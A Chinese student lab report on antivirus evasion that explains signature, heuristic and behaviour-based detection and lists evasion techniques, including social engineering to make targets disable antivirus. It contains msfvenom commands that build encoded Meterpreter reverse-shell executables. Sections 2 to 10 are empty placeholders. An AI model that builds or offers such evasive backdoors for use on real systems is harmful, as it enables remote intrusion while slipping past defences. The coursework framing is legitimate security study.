2020-3-30 201755110王礼博 Exp3 免杀原理与实践

目录

• 1.正确使用msf编码器

• 2.msfvenom生成如jar之类的其他文件

• 3.veil

• 4.加壳工具

• 5.使用C + shellcode编程

• 6.使用其他课堂未介绍方法

• 7.通过组合应用各种技术实现恶意代码免杀

• 8.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

• 9.基础问题回答
  （1）杀软是如何检测出恶意代码的？

  （2）免杀是做什么？

  （3）免杀的基本方法有哪些？

  （4）开启杀软能绝对防止电脑中恶意代码吗？

• 10.实践总结与体会

0. 基础知识

0.1 恶意软件检测机制

• 基于特征码的检测

  简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。

• 启发式恶意软件检测

  简单来说，就是根据些片面特征去推断。通常是因为缺乏精确判定依据。

  优点：

  • 可以检测0-day恶意软件

  • 具有一定通用性

  缺点：

  • 实时监控系统行为，开销稍多

  • 没有基于特征码的精确度高

• 基于行为的恶意软件检测

  最开始提出启发式时，一般也是针对特征扫描的而言的，指通用的、多特征的、非精确的扫描，所以后来又提出了基于行为的。

  从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

0.2 免杀技术(Evading AV)综述

总体技术有：

• 改变特征码

  • 如果你手里只有EXE

    • 加壳：压缩壳 加密壳

  • 有shellcode(像Meterpreter）

    • 用encode进行编码

    • 基于payload重新编译生成可执行文件

  • 有源代码

    • 用其他语言进行重写再编译（veil-evasion）

• 改变行为

  • 通讯方式

    • 尽量使用反弹式连接

    • 使用隧道技术

    • 加密通讯数据

  • 操作模式

    • 基于内存操作

    • 减少对系统的修改

    • 加入混淆作用的正常功能代码

• 非常规方法

  • 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。

  • 使用社工类攻击，诱骗目标关闭AV软件。

  • 纯手工打造一个恶意软件

返回目录

1. 正确使用msf编码器

• 使用VirusTotal或Virscan这两个网站对实验二中生成的后门程序meter_backdoor.exe进行扫描

• 尝试用msf编码器对后门程序进行一次到多次的编码，并进行检测，代码如下

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.26 LPORT=5215 -f exe > encoded1.exe

• 使用-i设置迭代次数,进行十次编码,结果检测之后发现情况并不理想

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.196.133 LPORT=5121 -f exe > encoded10.exe

返回目录

2. msfvenom生成如jar之类的其他文件
返回目录
3. 基础知识
返回目录
4. 基础知识
返回目录
5. 基础知识
返回目录
6. 基础知识
返回目录
7. 基础知识
返回目录
8. 基础知识
返回目录
9. 基础知识
返回目录
10. 基础知识
返回目录

标签：返回,免杀,Exp3,检测,恶意软件,30,基础知识,目录
来源： https://www.cnblogs.com/bjdzkjxywlb/p/12590767.html